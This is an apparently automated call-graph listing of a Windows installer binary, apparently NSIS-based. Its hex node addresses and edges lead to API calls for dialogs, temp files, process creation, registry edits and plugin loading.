5638->5636 5638->5637 5639 6f1d1516 GlobalFree 5638->5639 5639->5637 5641 6f1d10a2 5640->5641 5642 6f1d10a9 GlobalSize 5641->5642 5643 6f1d10b2 5641->5643 5642->5643 5644 6f1d10c7 5643->5644 5645 6f1d10b6 GlobalAlloc 5643->5645 5647 6f1d10d2 GlobalFree 5644->5647 5646 6f1d153d 3 API calls 5645->5646 5646->5644 5647->5636 5648 6f1d16d8 5649 6f1d1707 5648->5649 5650 6f1d1b63 22 API calls 5649->5650 5651 6f1d170e 5650->5651 5652 6f1d1715 5651->5652 5653 6f1d1721 5651->5653 5656 6f1d1272 2 API calls 5652->5656 5654 6f1d1748 5653->5654 5655 6f1d172b 5653->5655 5659 6f1d174e 5654->5659 5660 6f1d1772 5654->5660 5658 6f1d153d 3 API calls 5655->5658 5657 6f1d171f 5656->5657 5662 6f1d1730 5658->5662 5663 6f1d15b4 3 API calls 5659->5663 5661 6f1d153d 3 API calls 5660->5661 5661->5657 5664 6f1d15b4 3 API calls 5662->5664 5665 6f1d1753 5663->5665 5666 6f1d1736 5664->5666 5667 6f1d1272 2 API calls 5665->5667 5668 6f1d1272 2 API calls 5666->5668 5669 6f1d1759 GlobalFree 5667->5669 5670 6f1d173c GlobalFree 5668->5670 5669->5657 5671 6f1d176d GlobalFree 5669->5671 5670->5657 5671->5657 4794 403e86 4795 403fd9 4794->4795 4796 403e9e 4794->4796 4798 40402a 4795->4798 4799 403fea GetDlgItem GetDlgItem 4795->4799 4796->4795 4797 403eaa 4796->4797 4800 403eb5 SetWindowPos 4797->4800 4801 403ec8 4797->4801 4803 404084 4798->4803 4811 401389 2 API calls 4798->4811 4802 40435f 18 API calls 4799->4802 4800->4801 4805 403ee5 4801->4805 4806 403ecd ShowWindow 4801->4806 4807 404014 SetClassLongW 4802->4807 4804 4043ab SendMessageW 4803->4804 4825 403fd4 4803->4825 4835 404096 4804->4835 4808 403f07 4805->4808 4809 403eed DestroyWindow 4805->4809 4806->4805 4810 40140b 2 API calls 4807->4810 4813 403f0c SetWindowLongW 4808->4813 4814 403f1d 4808->4814 4812 404309 4809->4812 4810->4798 4815 40405c 4811->4815 4822 404319 ShowWindow 4812->4822 4812->4825 4813->4825 4818 403fc6 4814->4818 4819 403f29 GetDlgItem 4814->4819 4815->4803 4820 404060 SendMessageW 4815->4820 4816 40140b 2 API calls 4816->4835 4817 4042ea DestroyWindow EndDialog 4817->4812 4875 4043c6 4818->4875 4823 403f59 4819->4823 4824 403f3c SendMessageW IsWindowEnabled 4819->4824 4820->4825 4822->4825 4827 403f66 4823->4827 4828 403fad SendMessageW 4823->4828 4829 403f79 4823->4829 4838 403f5e 4823->4838 4824->4823 4824->4825 4826 40640a 17 API calls 4826->4835 4827->4828 4827->4838 4828->4818 4832 403f81 4829->4832 4833 403f96 4829->4833 4831 40435f 18 API calls 4831->4835 4836 40140b 2 API calls 4832->4836 4837 40140b 2 API calls 4833->4837 4834 403f94 4834->4818 4835->4816 4835->4817 4835->4825 4835->4826 4835->4831 4856 40422a DestroyWindow 4835->4856 4866 40435f 4835->4866 4836->4838 4839 403f9d 4837->4839 4872 404338 4838->4872 4839->4818 4839->4838 4841 404111 GetDlgItem 4842 404126 4841->4842 4843 40412e ShowWindow KiUserCallbackDispatcher 4841->4843 4842->4843 4869 404381 EnableWindow 4843->4869 4845 404158 EnableWindow 4850 40416c 4845->4850 4846 404171 GetSystemMenu EnableMenuItem SendMessageW 4847 4041a1 SendMessageW 4846->4847 4846->4850 4847->4850 4849 403e67 18 API calls 4849->4850 4850->4846 4850->4849 4870 404394 SendMessageW 4850->4870 4871 4063e8 lstrcpynW 4850->4871 4852 4041d0 lstrlenW 4853 40640a 17 API calls 4852->4853 4854 4041e6 SetWindowTextW 4853->4854 4855 401389 2 API calls 4854->4855 4855->4835 4856->4812 4857 404244 CreateDialogParamW 4856->4857 4857->4812 4858 404277 4857->4858 4859 40435f 18 API calls 4858->4859 4860 404282 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4859->4860 4861 401389 2 API calls 4860->4861 4862 4042c8 4861->4862 4862->4825 4863 4042d0 ShowWindow 4862->4863 4864 4043ab SendMessageW 4863->4864 4865 4042e8 4864->4865 4865->4812 4867 40640a 17 API calls 4866->4867 4868 40436a SetDlgItemTextW 4867->4868 4868->4841 4869->4845 4870->4850 4871->4852 4873 404345 SendMessageW 4872->4873 4874 40433f 4872->4874 4873->4834 4874->4873 4876 404489 4875->4876 4877 4043de GetWindowLongW 4875->4877 4876->4825 4877->4876 4878 4043f3 4877->4878 4878->4876 4879 404420 GetSysColor 4878->4879 4880 404423 4878->4880 4879->4880 4881 404433 SetBkMode 4880->4881 4882 404429 SetTextColor 4880->4882 4883 404451 4881->4883 4884 40444b GetSysColor 4881->4884 4882->4881 4885 404462 4883->4885 4886 404458 SetBkColor 4883->4886 4884->4883 4885->4876 4887 404475 DeleteObject 4885->4887 4888 40447c CreateBrushIndirect 4885->4888 4886->4885 4887->4888 4888->4876 5672 401f06 5673 402c41 17 API calls 5672->5673 5674 401f0c 5673->5674 5675 405450 24 API calls 5674->5675 5676 401f16 5675->5676 5677 4059d1 2 API calls 5676->5677 5678 401f1c 5677->5678 5680 406873 5 API calls 5678->5680 5682 40288b 5678->5682 5684 401f3f CloseHandle 5678->5684 5681 401f31 5680->5681 5681->5684 5685 40632f wsprintfW 5681->5685 5684->5682 5685->5684 5686 404809 5687 404819 5686->5687 5688 40483f 5686->5688 5689 40435f 18 API calls 5687->5689 5690 4043c6 8 API calls 5688->5690 5691 404826 SetDlgItemTextW 5689->5691 5692 40484b 5690->5692 5691->5688 5693 40190c 5694 401943 5693->5694 5695 402c41 17 API calls 5694->5695 5696 401948 5695->5696 5697 405afa 67 API calls 5696->5697 5698 401951 5697->5698 5699 40230c 5700 402314 5699->5700 5701 40231a 5699->5701 5702 402c41 17 API calls 5700->5702 5703 402328 5701->5703 5704 402c41 17 API calls 5701->5704 5702->5701 5705 402336 5703->5705 5706 402c41 17 API calls 5703->5706 5704->5703 5707 402c41 17 API calls 5705->5707 5706->5705 5708 40233f WritePrivateProfileStringW 5707->5708 5709 401f8c 5710 402c41 17 API calls 5709->5710 5711 401f93 5710->5711 5712 4067c2 5 API calls 5711->5712 5713 401fa2 5712->5713 5714 401fbe GlobalAlloc 5713->5714 5715 402026 5713->5715 5714->5715 5716 401fd2 5714->5716 5717 4067c2 5 API calls 5716->5717 5718 401fd9 5717->5718 5719 4067c2 5 API calls 5718->5719 5720 401fe3 5719->5720 5720->5715 5724 40632f wsprintfW 5720->5724 5722 402018 5725 40632f wsprintfW 5722->5725 5724->5722 5725->5715 4993 40238e 4994 4023c1 4993->4994 4995 402396 4993->4995 4996 402c41 17 API calls 4994->4996 4997 402c81 17 API calls 4995->4997 4999 4023c8 4996->4999 4998 40239d 4997->4998 5000 4023a7 4998->5000 5004 4023d5 4998->5004 5005 402cff 4999->5005 5002 402c41 17 API calls 5000->5002 5003 4023ae RegDeleteValueW RegCloseKey 5002->5003 5003->5004 5006 402d13 5005->5006 5007 402d0c 5005->5007 5006->5007 5009 402d44 5006->5009 5007->5004 5010 406255 RegOpenKeyExW 5009->5010 5011 402d72 5010->5011 5012 402dec 5011->5012 5019 402d76 5011->5019 5012->5007 5013 402d98 RegEnumKeyW 5014 402daf RegCloseKey 5013->5014 5013->5019 5016 4067c2 5 API calls 5014->5016 5015 402dd0 RegCloseKey 5015->5012 5018 402dbf 5016->5018 5017 402d44 6 API calls 5017->5019 5020 402de0 RegDeleteKeyW 5018->5020 5021 402dc3 5018->5021 5019->5013 5019->5014 5019->5015 5019->5017 5020->5012 5021->5012 5726 40190f 5727 402c41 17 API calls 5726->5727 5728 401916 5727->5728 5729 405a4e MessageBoxIndirectW 5728->5729 5730 40191f 5729->5730 5731 40558f 5732 4055b0 GetDlgItem GetDlgItem GetDlgItem 5731->5732 5733 405739 5731->5733 5776 404394 SendMessageW 5732->5776 5735 405742 GetDlgItem CreateThread CloseHandle 5733->5735 5736 40576a 5733->5736 5735->5736 5737 405781 ShowWindow ShowWindow 5736->5737 5738 4057ba 5736->5738 5739 405795 5736->5739 5778 404394 SendMessageW 5737->5778 5746 4043c6 8 API calls 5738->5746 5740 4057f5 5739->5740 5744 4057a9 5739->5744 5745 4057cf ShowWindow 5739->5745 5740->5738 5749 405803 SendMessageW 5740->5749 5741 405620 5742 405627 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5741->5742 5747 405695 5742->5747 5748 405679 SendMessageW SendMessageW 5742->5748 5750 404338 SendMessageW 5744->5750 5752 4057e1 5745->5752 5753 4057ef 5745->5753 5751 4057c8 5746->5751 5754 4056a8 5747->5754 5755 40569a SendMessageW 5747->5755 5748->5747 5749->5751 5756 40581c CreatePopupMenu 5749->5756 5750->5738 5757 405450 24 API calls 5752->5757 5758 404338 SendMessageW 5753->5758 5760 40435f 18 API calls 5754->5760 5755->5754 5759 40640a 17 API calls 5756->5759 5757->5753 5758->5740 5761 40582c AppendMenuW 5759->5761 5762 4056b8 5760->5762 5763 405849 GetWindowRect 5761->5763 5764 40585c TrackPopupMenu 5761->5764 5765 4056c1 ShowWindow 5762->5765 5766 4056f5 GetDlgItem SendMessageW 5762->5766 5763->5764 5764->5751 5767 405877 5764->5767 5768 4056d7 ShowWindow 5765->5768 5771 4056e4 5765->5771 5766->5751 5769 40571c SendMessageW SendMessageW 5766->5769 5770 405893 SendMessageW 5767->5770 5768->5771 5769->5751 5770->5770 5772 4058b0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5770->5772 5777 404394 SendMessageW 5771->5777 5774 4058d5 SendMessageW 5772->5774 5774->5774 5775 4058fe GlobalUnlock SetClipboardData CloseClipboard 5774->5775 5775->5751 5776->5741 5777->5766 5778->5739 5779 401491 5780 405450 24 API calls 5779->5780 5781 401498 5780->5781 5789 6f1d2c4f 5790 6f1d2c67 5789->5790 5791 6f1d158f 2 API calls 5790->5791 5792 6f1d2c82 5791->5792 5793 401d14 5794 402c1f 17 API calls 5793->5794 5795 401d1b 5794->5795 5796 402c1f 17 API calls 5795->5796 5797 401d27 GetDlgItem 5796->5797 5798 402592 5797->5798 5799 404495 lstrcpynW lstrlenW 5800 403a96 5801 403aa1 5800->5801 5802 403aa5 5801->5802 5803 403aa8 GlobalAlloc 5801->5803 5803->5802 5804 402598 5805 4025c7 5804->5805 5806 4025ac 5804->5806 5808 4025fb 5805->5808 5809 4025cc 5805->5809 5807 402c1f 17 API calls 5806->5807 5814 4025b3 5807->5814 5810 402c41 17 API calls 5808->5810 5811 402c41 17 API calls 5809->5811 5812 402602 lstrlenW 5810->5812 5813 4025d3 WideCharToMultiByte lstrlenA 5811->5813 5812->5814 5813->5814 5815 402645 5814->5815 5816 40262f 5814->5816 5818 405fbf 5 API calls 5814->5818 5816->5815 5817 405f90 WriteFile 5816->5817 5817->5815 5818->5816 5819 40451e 5820 404650 5819->5820 5822 404536 5819->5822 5821 4046ba 5820->5821 5823 404784 5820->5823 5829 40468b GetDlgItem SendMessageW 5820->5829 5821->5823 5824 4046c4 GetDlgItem 5821->5824 5827 40435f 18 API calls 5822->5827 5828 4043c6 8 API calls 5823->5828 5825 404745 5824->5825 5826 4046de 5824->5826 5825->5823 5833 404757 5825->5833 5826->5825 5832 404704 SendMessageW LoadCursorW SetCursor 5826->5832 5830 40459d 5827->5830 5831 40477f 5828->5831 5852 404381 EnableWindow 5829->5852 5835 40435f 18 API calls 5830->5835 5853 4047cd 5832->5853 5837 40476d 5833->5837 5838 40475d SendMessageW 5833->5838 5840 4045aa CheckDlgButton 5835->5840 5837->5831 5843 404773 SendMessageW 5837->5843 5838->5837 5839 4046b5 5844 4047a9 SendMessageW 5839->5844 5850 404381 EnableWindow 5840->5850 5843->5831 5844->5821 5845 4045c8 GetDlgItem 5851 404394 SendMessageW 5845->5851 5847 4045de SendMessageW 5848 404604 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5847->5848 5849 4045fb GetSysColor 5847->5849 5848->5831 5849->5848 5850->5845 5851->5847 5852->5839 5856 405a14 ShellExecuteExW 5853->5856 5855 404733 LoadCursorW SetCursor 5855->5825 5856->5855 5857 40149e 5858 4022f7 5857->5858 5859 4014ac PostQuitMessage 5857->5859 5859->5858 5860 401c1f 5861 402c1f 17 API calls 5860->5861 5862 401c26 5861->5862 5863 402c1f 17 API calls 5862->5863 5864 401c33 5863->5864 5865 402c41 17 API calls 5864->5865 5869 401c48 5864->5869 5865->5869 5866 402c41 17 API calls 5870 401c58 5866->5870 5867 401c63 5871 402c1f 17 API calls 5867->5871 5868 401caf 5872 402c41 17 API calls 5868->5872 5869->5866 5869->5870 5870->5867 5870->5868 5873 401c68 5871->5873 5874 401cb4 5872->5874 5875 402c1f 17 API calls 5873->5875 5876 402c41 17 API calls 5874->5876 5877 401c74 5875->5877 5878 401cbd FindWindowExW 5876->5878 5879 401c81 SendMessageTimeoutW 5877->5879 5880 401c9f SendMessageW 5877->5880 5881 401cdf 5878->5881 5879->5881 5880->5881 5882 402aa0 SendMessageW 5883 402ac5 5882->5883 5884 402aba InvalidateRect 5882->5884 5884->5883 5885 402821 5886 402827 5885->5886 5887 40282f FindClose 5886->5887 5888 402ac5 5886->5888 5887->5888 5889 4015a3 5890 402c41 17 API calls 5889->5890 5891 4015aa SetFileAttributesW 5890->5891 5892 4015bc 5891->5892 4551 4034a5 SetErrorMode GetVersion 4552 4034e4 4551->4552 4553 4034ea 4551->4553 4554 4067c2 5 API calls 4552->4554 4555 406752 3 API calls 4553->4555 4554->4553 4556 403500 lstrlenA 4555->4556 4556->4553 4557 403510 4556->4557 4558 4067c2 5 API calls 4557->4558 4559 403517 4558->4559 4560 4067c2 5 API calls 4559->4560 4561 40351e 4560->4561 4562 4067c2 5 API calls 4561->4562 4563 40352a #17 OleInitialize SHGetFileInfoW 4562->4563 4641 4063e8 lstrcpynW 4563->4641 4566 403576 GetCommandLineW 4642 4063e8 lstrcpynW 4566->4642 4568 403588 4569 405cea CharNextW 4568->4569 4570 4035ad CharNextW 4569->4570 4571 4036d7 GetTempPathW 4570->4571 4573 4035c6 4570->4573 4643 403474 4571->4643 4573->4573 4578 405cea CharNextW 4573->4578 4585 4036c2 4573->4585 4587 4036c0 4573->4587 4574 4036ef 4575 4036f3 GetWindowsDirectoryW lstrcatW 4574->4575 4576 403749 DeleteFileW 4574->4576 4577 403474 12 API calls 4575->4577 4653 402f30 GetTickCount GetModuleFileNameW 4576->4653 4580 40370f 4577->4580 4578->4573 4580->4576 4582 403713 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4580->4582 4581 40375d 4583 403810 4581->4583 4588 403800 4581->4588 4592 405cea CharNextW 4581->4592 4586 403474 12 API calls 4582->4586 4742 4039e6 4583->4742 4739 4063e8 lstrcpynW 4585->4739 4590 403741 4586->4590 4587->4571 4683 403ad8 4588->4683 4590->4576 4590->4583 4605 40377c 4592->4605 4594 40394a 4597 403952 GetCurrentProcess OpenProcessToken 4594->4597 4598 4039ce ExitProcess 4594->4598 4595 40382a 4751 405a4e 4595->4751 4603 40396a LookupPrivilegeValueW AdjustTokenPrivileges 4597->4603 4604 40399e 4597->4604 4600 403840 4607 4059b9 5 API calls 4600->4607 4601 4037da 4606 405dc5 18 API calls 4601->4606 4603->4604 4608 4067c2 5 API calls 4604->4608 4605->4600 4605->4601 4609 4037e6 4606->4609 4610 403845 lstrcatW 4607->4610 4611 4039a5 4608->4611 4609->4583 4740 4063e8 lstrcpynW 4609->4740 4612 403861 lstrcatW lstrcmpiW 4610->4612 4613 403856 lstrcatW 4610->4613 4614 4039ba ExitWindowsEx 4611->4614 4615 4039c7 4611->4615 4612->4583 4617 40387d 4612->4617 4613->4612 4614->4598 4614->4615 4618 40140b 2 API calls 4615->4618 4620 403882 4617->4620 4621 403889 4617->4621 4618->4598 4619 4037f5 4741 4063e8 lstrcpynW 4619->4741 4624 40591f 4 API calls 4620->4624 4622 40599c 2 API calls 4621->4622 4625 40388e SetCurrentDirectoryW 4622->4625 4626 403887 4624->4626 4627 4038a9 4625->4627 4628 40389e 4625->4628 4626->4625 4756 4063e8 lstrcpynW 4627->4756 4755 4063e8 lstrcpynW 4628->4755 4631 40640a 17 API calls 4632 4038e8 DeleteFileW 4631->4632 4633 4038f5 CopyFileW 4632->4633 4638 4038b7 4632->4638 4633->4638 4634 40393e 4635 4061ae 36 API calls 4634->4635 4635->4583 4636 4061ae 36 API calls 4636->4638 4637 40640a 17 API calls 4637->4638 4638->4631 4638->4634 4638->4636 4638->4637 4640 403929 CloseHandle 4638->4640 4757 4059d1 CreateProcessW 4638->4757 4640->4638 4641->4566 4642->4568 4644 40667c 5 API calls 4643->4644 4645 403480 4644->4645 4646 40348a 4645->4646 4647 405cbd 3 API calls 4645->4647 4646->4574 4648 403492 4647->4648 4649 40599c 2 API calls 4648->4649 4650 403498 4649->4650 4760 405f0d 4650->4760 4764 405ede GetFileAttributesW CreateFileW 4653->4764 4655 402f73 4682 402f80 4655->4682 4765 4063e8 lstrcpynW 4655->4765 4657 402f96 4658 405d09 2 API calls 4657->4658 4659 402f9c 4658->4659 4766 4063e8 lstrcpynW 4659->4766 4661 402fa7 GetFileSize 4662 4030a8 4661->4662 4680 402fbe 4661->4680 4663 402e8e 32 API calls 4662->4663 4664 4030af 4663->4664 4666 4030eb GlobalAlloc 4664->4666 4664->4682 4768 40345d SetFilePointer 4664->4768 4665 403447 ReadFile 4665->4680 4670 403102 4666->4670 4667 403143 4668 402e8e 32 API calls 4667->4668 4668->4682 4672 405f0d 2 API calls 4670->4672 4671 4030cc 4673 403447 ReadFile 4671->4673 4675 403113 CreateFileW 4672->4675 4676 4030d7 4673->4676 4674 402e8e 32 API calls 4674->4680 4677 40314d 4675->4677 4675->4682 4676->4666 4676->4682 4767 40345d SetFilePointer 4677->4767 4679 40315b 4681 4031d6 44 API calls 4679->4681 4680->4662 4680->4665 4680->4667 4680->4674 4680->4682 4681->4682 4682->4581 4684 4067c2 5 API calls 4683->4684 4685 403aec 4684->4685 4686 403af2 4685->4686 4687 403b04 4685->4687 4777 40632f wsprintfW 4686->4777 4688 4062b6 3 API calls 4687->4688 4689 403b34 4688->4689 4690 403b53 lstrcatW 4689->4690 4692 4062b6 3 API calls 4689->4692 4693 403b02 4690->4693 4692->4690 4769 403dae 4693->4769 4696 405dc5 18 API calls 4697 403b85 4696->4697 4698 403c19 4697->4698 4700 4062b6 3 API calls 4697->4700 4699 405dc5 18 API calls 4698->4699 4701 403c1f 4699->4701 4703 403bb7 4700->4703 4702 403c2f LoadImageW 4701->4702 4704 40640a 17 API calls 4701->4704 4705 403cd5 4702->4705 4706 403c56 RegisterClassW 4702->4706 4703->4698 4707 403bd8 lstrlenW 4703->4707 4710 405cea CharNextW 4703->4710 4704->4702 4709 40140b 2 API calls 4705->4709 4708 403c8c SystemParametersInfoW CreateWindowExW 4706->4708 4738 403cdf 4706->4738 4711 403be6 lstrcmpiW 4707->4711 4712 403c0c 4707->4712 4708->4705 4713 403cdb 4709->4713 4714 403bd5 4710->4714 4711->4712 4715 403bf6 GetFileAttributesW 4711->4715 4716 405cbd 3 API calls 4712->4716 4718 403dae 18 API calls 4713->4718 4713->4738 4714->4707 4717 403c02 4715->4717 4719 403c12 4716->4719 4717->4712 4720 405d09 2 API calls 4717->4720 4721 403cec 4718->4721 4778 4063e8 lstrcpynW 4719->4778 4720->4712 4723 403cf8 ShowWindow 4721->4723 4724 403d7b 4721->4724 4726 406752 3 API calls 4723->4726 4779 405523 OleInitialize 4724->4779 4728 403d10 4726->4728 4727 403d81 4729 403d85 4727->4729 4730 403d9d 4727->4730 4731 403d1e GetClassInfoW 4728->4731 4733 406752 3 API calls 4728->4733 4737 40140b 2 API calls 4729->4737 4729->4738 4732 40140b 2 API calls 4730->4732 4734 403d32 GetClassInfoW RegisterClassW 4731->4734 4735 403d48 DialogBoxParamW 4731->4735 4732->4738 4733->4731 4734->4735 4736 40140b 2 API calls 4735->4736 4736->4738 4737->4738 4738->4583 4739->4587 4740->4619 4741->4588 4743 403a01 4742->4743 4744 4039f7 CloseHandle 4742->4744 4745 403a15 4743->4745 4746 403a0b CloseHandle 4743->4746 4744->4743 4790 403a43 4745->4790 4746->4745 4749 405afa 67 API calls 4750 403819 OleUninitialize 4749->4750 4750->4594 4750->4595 4752 405a63 4751->4752 4753 403838 ExitProcess 4752->4753 4754 405a77 MessageBoxIndirectW 4752->4754 4754->4753 4755->4627 4756->4638 4758 405a10 4757->4758 4759 405a04 CloseHandle 4757->4759 4758->4638 4759->4758 4761 405f1a GetTickCount GetTempFileNameW 4760->4761 4762 405f50 4761->4762 4763 4034a3 4761->4763 4762->4761 4762->4763 4763->4574 4764->4655 4765->4657 4766->4661 4767->4679 4768->4671 4770 403dc2 4769->4770 4786 40632f wsprintfW 4770->4786 4772 403e33 4787 403e67 4772->4787 4774 403b63 4774->4696 4775 403e38 4775->4774 4776 40640a 17 API calls 4775->4776 4776->4775 4777->4693 4778->4698 4780 4043ab SendMessageW 4779->4780 4783 405546 4780->4783 4781 40556d 4782 4043ab SendMessageW 4781->4782 4784 40557f OleUninitialize 4782->4784 4783->4781 4785 401389 2 API calls 4783->4785 4784->4727 4785->4783 4786->4772 4788 40640a 17 API calls 4787->4788 4789 403e75 SetWindowTextW 4788->4789 4789->4775 4791 403a51 4790->4791 4792 403a1a 4791->4792 4793 403a56 FreeLibrary GlobalFree 4791->4793 4792->4749 4793->4792 4793->4793 5893 404ba6 5894 404bd2 5893->5894 5895 404bb6 5893->5895 5897 404c05 5894->5897 5898 404bd8 SHGetPathFromIDListW 5894->5898 5904 405a32 GetDlgItemTextW 5895->5904 5900 404be8 5898->5900 5903 404bef SendMessageW 5898->5903 5899 404bc3 SendMessageW 5899->5894 5901 40140b 2 API calls 5900->5901 5901->5903 5903->5897 5904->5899 5919 4029a8 5920 402c1f 17 API calls 5919->5920 5921 4029ae 5920->5921 5922 4029d5 5921->5922 5923 4029ee 5921->5923 5932 40288b 5921->5932 5926 4029da 5922->5926 5927 4029eb 5922->5927 5924 402a08 5923->5924 5925 4029f8 5923->5925 5929 40640a 17 API calls 5924->5929 5928 402c1f 17 API calls 5925->5928 5933 4063e8 lstrcpynW 5926->5933 5927->5932 5934 40632f wsprintfW 5927->5934 5928->5927 5929->5927 5933->5932 5934->5932 5935 6f1d1671 5936 6f1d1516 GlobalFree 5935->5936 5938 6f1d1689 5936->5938 5937 6f1d16cf GlobalFree 5938->5937 5939 6f1d16a4 5938->5939 5940 6f1d16bb VirtualFree 5938->5940 5939->5937 5940->5937 5941 4028ad 5942 402c41 17 API calls 5941->5942 5944 4028bb 5942->5944 5943 4028d1 5946 405eb9 2 API calls 5943->5946 5944->5943 5945 402c41 17 API calls 5944->5945 5945->5943 5947 4028d7 5946->5947 5969 405ede GetFileAttributesW CreateFileW 5947->5969 5949 4028e4 5950 4028f0 GlobalAlloc 5949->5950 5951 402987 5949->5951 5952 402909 5950->5952 5953 40297e CloseHandle 5950->5953 5954 4029a2 5951->5954 5955 40298f DeleteFileW 5951->5955 5970 40345d SetFilePointer 5952->5970 5953->5951 5955->5954 5957 40290f 5958 403447 ReadFile 5957->5958 5959 402918 GlobalAlloc 5958->5959 5960 402928 5959->5960 5961 40295c 5959->5961 5963 4031d6 44 API calls 5960->5963 5962 405f90 WriteFile 5961->5962 5964 402968 GlobalFree 5962->5964 5966 402935 5963->5966 5965 4031d6 44 API calls 5964->5965 5968 40297b 5965->5968 5967 402953 GlobalFree 5966->5967 5967->5961 5968->5953 5969->5949 5970->5957 5978 401a30 5979 402c41 17 API calls 5978->5979 5980 401a39 ExpandEnvironmentStringsW 5979->5980 5981 401a4d 5980->5981 5983 401a60 5980->5983 5982 401a52 lstrcmpW 5981->5982 5981->5983 5982->5983 5072 402032 5073 402044 5072->5073 5074 4020f6 5072->5074 5075 402c41 17 API calls 5073->5075 5076 401423 24 API calls 5074->5076 5077 40204b 5075->5077 5082 402250 5076->5082 5078 402c41 17 API calls 5077->5078 5079 402054 5078->5079 5080 40206a LoadLibraryExW 5079->5080 5081 40205c GetModuleHandleW 5079->5081 5080->5074 5083 40207b 5080->5083 5081->5080 5081->5083 5095 406831 WideCharToMultiByte 5083->5095 5086 4020c5 5090 405450 24 API calls 5086->5090 5087 40208c 5088 402094 5087->5088 5089 4020ab 5087->5089 5091 401423 24 API calls 5088->5091 5098 6f1d177b 5089->5098 5092 40209c 5090->5092 5091->5092 5092->5082 5093 4020e8 FreeLibrary 5092->5093 5093->5082 5096 40685b GetProcAddress 5095->5096 5097 402086 5095->5097 5096->5097 5097->5086 5097->5087 5099 6f1d17ae 5098->5099 5140 6f1d1b63 5099->5140 5101 6f1d17b5 5102 6f1d18da 5101->5102 5103 6f1d17cd 5101->5103 5104 6f1d17c6 5101->5104 5102->5092 5174 6f1d2398 5103->5174 5190 6f1d2356 5104->5190 5109 6f1d17f2 5110 6f1d1831 5109->5110 5111 6f1d1813 5109->5111 5116 6f1d1837 5110->5116 5117 6f1d1882 5110->5117 5203 6f1d256d 5111->5203 5112 6f1d17fc 5112->5109 5200 6f1d2d2f 5112->5200 5113 6f1d17e3 5115 6f1d17e9 5113->5115 5119 6f1d17f4 5113->5119 5115->5109 5184 6f1d2a74 5115->5184 5222 6f1d15c6 5116->5222 5123 6f1d256d 10 API calls 5117->5123 5118 6f1d1819 5214 6f1d15b4 5118->5214 5194 6f1d2728 5119->5194 5127 6f1d1873 5123->5127 5131 6f1d18c9 5127->5131 5229 6f1d2530 5127->5229 5129 6f1d17fa 5129->5109 5130 6f1d256d 10 API calls 5130->5127 5131->5102 5135 6f1d18d3 GlobalFree 5131->5135 5135->5102 5137 6f1d18b5 5137->5131 5233 6f1d153d wsprintfW 5137->5233 5138 6f1d18ae FreeLibrary 5138->5137 5236 6f1d121b GlobalAlloc 5140->5236 5142 6f1d1b87 5237 6f1d121b GlobalAlloc 5142->5237 5144 6f1d1dad GlobalFree GlobalFree GlobalFree 5146 6f1d1dca 5144->5146 5167 6f1d1e14 5144->5167 5145 6f1d1b92 5145->5144 5147 6f1d1c68 GlobalAlloc 5145->5147 5151 6f1d1cb3 lstrcpyW 5145->5151 5152 6f1d1cd1 GlobalFree 5145->5152 5156 6f1d1cbd lstrcpyW 5145->5156 5160 6f1d2068 5145->5160 5162 6f1d20f0 5145->5162 5165 6f1d1d0f 5145->5165 5166 6f1d1fa9 GlobalFree 5145->5166 5145->5167 5171 6f1d122c 2 API calls 5145->5171 5148 6f1d1ddf 5146->5148 5149 6f1d2196 5146->5149 5146->5167 5147->5145 5148->5167 5240 6f1d122c 5148->5240 5150 6f1d21b8 GetModuleHandleW 5149->5150 5149->5167 5153 6f1d21de 5150->5153 5154 6f1d21c9 LoadLibraryW 5150->5154 5151->5156 5152->5145 5244 6f1d1621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5153->5244 5154->5153 5154->5167 5156->5145 5157 6f1d2230 5159 6f1d223d lstrlenW 5157->5159 5157->5167 5245 6f1d1621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5159->5245 5243 6f1d121b GlobalAlloc 5160->5243 5161 6f1d21f0 5161->5157 5172 6f1d221a GetProcAddress 5161->5172 5162->5167 5168 6f1d2138 lstrcpyW 5162->5168 5165->5145 5238 6f1d158f GlobalSize GlobalAlloc 5165->5238 5166->5145 5167->5101 5168->5167 5169 6f1d2257 5169->5167 5171->5145 5172->5157 5173 6f1d2071 5173->5101 5176 6f1d23b0 5174->5176 5175 6f1d122c GlobalAlloc lstrcpynW 5175->5176 5176->5175 5178 6f1d24d9 GlobalFree 5176->5178 5180 6f1d2458 GlobalAlloc WideCharToMultiByte 5176->5180 5181 6f1d2483 GlobalAlloc CLSIDFromString 5176->5181 5183 6f1d24a2 5176->5183 5247 6f1d12ba 5176->5247 5178->5176 5179 6f1d17d3 5178->5179 5179->5109 5179->5112 5179->5113 5180->5178 5181->5178 5183->5178 5251 6f1d26bc 5183->5251 5186 6f1d2a86 5184->5186 5185 6f1d2b2b VirtualAlloc 5187 6f1d2b49 5185->5187 5186->5185 5188 6f1d2c3a GetLastError 5187->5188 5189 6f1d2c45 5187->5189 5188->5189 5189->5109 5191 6f1d236b 5190->5191 5192 6f1d2376 GlobalAlloc 5191->5192 5193 6f1d17cc 5191->5193 5192->5191 5193->5103 5198 6f1d2758 5194->5198 5195 6f1d2806 5197 6f1d280c GlobalSize 5195->5197 5199 6f1d2816 5195->5199 5196 6f1d27f3 GlobalAlloc 5196->5199 5197->5199 5198->5195 5198->5196 5199->5129 5201 6f1d2d3a 5200->5201 5202 6f1d2d7a GlobalFree 5201->5202 5254 6f1d121b GlobalAlloc 5203->5254 5205 6f1d25f0 MultiByteToWideChar 5212 6f1d2577 5205->5212 5206 6f1d2623 lstrcpynW 5206->5212 5207 6f1d2612 StringFromGUID2 5207->5212 5208 6f1d265a GlobalFree 5208->5212 5209 6f1d2636 wsprintfW 5209->5212 5210 6f1d268f GlobalFree 5210->5118 5211 6f1d1272 2 API calls 5211->5212 5212->5205 5212->5206 5212->5207 5212->5208 5212->5209 5212->5210 5212->5211 5255 6f1d12e1 5212->5255 5259 6f1d121b GlobalAlloc 5214->5259 5216 6f1d15b9 5217 6f1d15c6 2 API calls 5216->5217 5218 6f1d15c3 5217->5218 5219 6f1d1272 5218->5219 5220 6f1d127b GlobalAlloc lstrcpynW 5219->5220 5221 6f1d12b5 GlobalFree 5219->5221 5220->5221 5221->5127 5223 6f1d15e4 5222->5223 5224 6f1d15d6 lstrcpyW 5222->5224 5223->5224 5226 6f1d15f0 5223->5226 5227 6f1d161d 